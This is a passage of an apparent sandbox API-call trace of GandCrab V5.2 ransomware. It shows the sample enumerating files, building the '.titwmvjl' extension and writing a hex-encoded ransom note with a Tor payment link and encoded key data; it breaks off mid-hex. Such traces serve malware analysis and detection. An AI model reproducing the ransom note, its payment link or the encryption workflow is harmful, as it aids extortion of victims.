1 [0096.989] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0 [0096.989] FindClose (in: hFindFile=0x5034f8 | out: hFindFile=0x5034f8) returned 1 [0096.989] CloseHandle (hObject=0x230) returned 1 [0096.989] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0096.990] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0096.990] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0096.990] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\Public\\desktop.ini") returned="C:\\Users\\Public\\desktop.ini" [0096.990] lstrlenW (lpString=".titwmvjl") returned 9 [0096.990] lstrlenW (lpString="C:\\Users\\Public\\desktop.ini") returned 27 [0096.990] VirtualAlloc (lpAddress=0x0, dwSize=0x76, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.990] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Public\\desktop.ini.titwmvjl") returned 36 [0096.990] lstrlenW (lpString="C:\\Users\\Public\\desktop.ini") returned 27 [0096.990] lstrlenW (lpString=".ini") returned 4 [0096.990] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.990] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".ini ") returned 5 [0096.990] lstrcmpiW (lpString1=".ini", lpString2=".titwmvjl") returned -1 [0096.990] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.990] lstrlenW (lpString="C:\\Users\\Public\\desktop.ini") returned 27 [0096.990] lstrlenW (lpString="C:\\Users\\Public\\desktop.ini") returned 27 [0096.990] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0096.990] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.991] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0096.991] lstrcmpW (lpString1="Documents", lpString2=".") returned 1 [0096.991] lstrcmpW (lpString1="Documents", lpString2="..") returned 1 [0096.991] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="Documents" | out: lpString1="C:\\Users\\Public\\Documents") returned="C:\\Users\\Public\\Documents" [0096.991] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Documents\\") returned="C:\\Users\\Public\\Documents\\" [0096.991] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0096.991] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.991] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0096.991] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.991] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0096.991] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.991] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0096.992] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.992] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0096.992] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.992] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.992] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Public\\Documents\\\\TITWMVJL-DECRYPT.txt") returned 47 [0096.992] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\public\\documents\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0096.995] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5